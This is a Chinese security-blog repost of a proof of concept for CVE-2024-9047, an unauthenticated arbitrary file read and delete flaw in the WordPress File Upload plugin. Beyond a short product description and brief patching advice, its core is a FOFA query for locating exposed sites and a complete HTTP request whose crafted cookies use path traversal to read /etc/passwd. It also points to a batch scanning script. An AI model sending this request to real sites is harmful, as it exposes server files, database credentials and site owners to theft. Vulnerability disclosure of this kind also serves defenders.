WordPress File Upload 插件 任意文件读取漏洞(CVE-2024-9047)PoC

admin 2024年12月26日15:09:15评论95 views字数 1372阅读4分34秒阅读模式

0x02

产品介绍

WordPress File Upload插件是一款功能强大的WordPress站点文件上传插件,它允许用户在WordPress站点中的文章、页面、侧边栏或表单中轻松上传文件到wp-contents目录中的任何位置。该插件使用最新的HTML5技术,确保在现代浏览器和移动设备上都能流畅运行,同时也兼容旧的浏览器。它能够满足用户在不同场景下的文件上传需求,并提供了丰富的自定义选项和高级功能。

0x03

漏洞威胁

WordPress File Upload 插件,在 <= 4.24.11 版本前的 wfu_file_downloader.php 文件存在前台任意文件读取+任意文件删除漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x04

漏洞环境

FOFA:

"wp-content/plugins/wp-file-upload"

WordPress File Upload 插件 任意文件读取漏洞(CVE-2024-9047)PoC

0x05

漏洞复现

PoC

GET/wp-content/plugins/wp-file-upload/wfu_file_downloader.php?file=pQ1DyzbQp5hBxQpW&ticket=Hw8h7dBmxROx27ZZ&handler=dboption&session_legacy=1&dboption_base=cookies&dboption_useold=0&wfu_cookie=wp_wpfileupload_939a4dc9e3d96a97c2dd1bdcbeab52ce HTTP/1.1Host: User-Agent: Mozilla/5.0 (WindowsNT10.0Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: wp_wpfileupload_939a4dc9e3d96a97c2dd1bdcbeab52ce=cfyMMnYQqNBbcBNMLTCDnE7ezEAdzLC3; wfu_storage_pQ1DyzbQp5hBxQpW=/../../../../../etc/passwd[[name]]; wfu_download_ticket_Hw8h7dBmxROx27ZZ=当前时间戳; wfu_ABSPATH=/Connection: close
PS:cookie中需指定当前时间戳

WordPress File Upload 插件 任意文件读取漏洞(CVE-2024-9047)PoC
WordPress File Upload 插件 任意文件读取漏洞(CVE-2024-9047)PoC
0x06

批量脚本验证

Nuclei验证脚本已发布知识星球:冷漠安全

WordPress File Upload 插件 任意文件读取漏洞(CVE-2024-9047)PoC

0x07

修复建议

关闭互联网暴露面或接口设置访问权限

升级插件至安全版本

0x08

 

原文始发于微信公众号(冷漠安全):「漏洞复现」WordPress File Upload 插件 任意文件读取漏洞(CVE-2024-9047)

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月26日15:09:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   WordPress File Upload 插件 任意文件读取漏洞(CVE-2024-9047)PoChttps://cn-sec.com/archives/3554356.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息